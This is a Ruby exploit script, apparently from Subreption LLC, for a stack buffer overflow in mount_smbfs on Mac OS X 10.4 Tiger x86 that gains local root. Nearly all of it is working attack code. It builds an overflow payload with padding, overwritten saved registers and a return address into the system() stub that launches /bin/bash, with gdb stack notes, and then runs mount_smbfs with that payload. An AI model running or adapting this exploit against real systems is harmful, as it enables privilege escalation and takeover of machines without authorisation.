# Copyright (C) 2007-2008 Subreption LLC. All rights reserved.
# Visit http://blog.subreption.com for exploit development notes.
#
# References:
#   http://static.subreption.com/public/exploits/mount_smbfs_root.c 
#
# Version: 1.0a (+tiger_x86)
#
# Distributed under the terms of the Subreption Open Source License v1.0
# http://static.subreption.com/public/documents/subreption-sosl-1.0.txt
#

module AppleOSX
  class SMBFSMountLocalRoot
    #
    # (gdb) x/12x $esp
    # 0xbfffe830:	0x5a5a5a5a	0x00000000	0xbffff441	0x00000002
    # 0xbfffe840:	0x00000002	0x00000000	0x01800000	0x9080eaf1
    # 0xbfffe850:	0x00300dd0	0x00000012	0x00000000	0xffffffff
    #
    # 0x9080eaf1 <_CFProcessPath+17>:	0x4de3838b
    # 0xbffff441:	 'A' <repeats 200 times>...
    # 0xbffff875:	 "/bin/bash"
    #
    def make_payload(padding = 1040)
      payload = ("A" * padding)
      payload << [0xcafecafe].pack("V") # ebx
      payload << [0xdefacedd].pack("V") # esi
      payload << [0xfeedface].pack("V") # edi
      payload << [0xdeadbeef].pack("V") # ebp+0
      payload << [@ret_addr].pack("V")  # eip
      payload << [0xa11b06d1].pack("V") # saved eip, dyld_stub_exit()
      payload << [0xbffff8fd].pack("V") # SHELL=/bin/bash
    end
    
    def exploit
      payload = make_payload(1040)
      puts "Payload size: #{payload.size} bytes"
      exec "/sbin/mount_smbfs -W " + payload
    end
    
    def initialize
      @arch = RUBY_PLATFORM.scan(/(.+?)-darwin/).flatten[0]
      
      case @arch
       when "i686"
         @ret_addr = 0xa0be2280 # to system() dyld stub
       else
         raise "Only x86 is currently supported in this public version."
      end
      
      puts "Target architecture: #{@arch} return address: " +
           sprintf("0x%x", @ret_addr)
    end
  end
end

puts "Mac OS X 10.4.10-11 (Tiger) mount_smbfs Stack Buffer Overflow exploit"
puts "Copyright (C) 2007-2008, Subreption LLC. All rights reserved."
test_run = AppleOSX::SMBFSMountLocalRoot.new()
test_run.exploit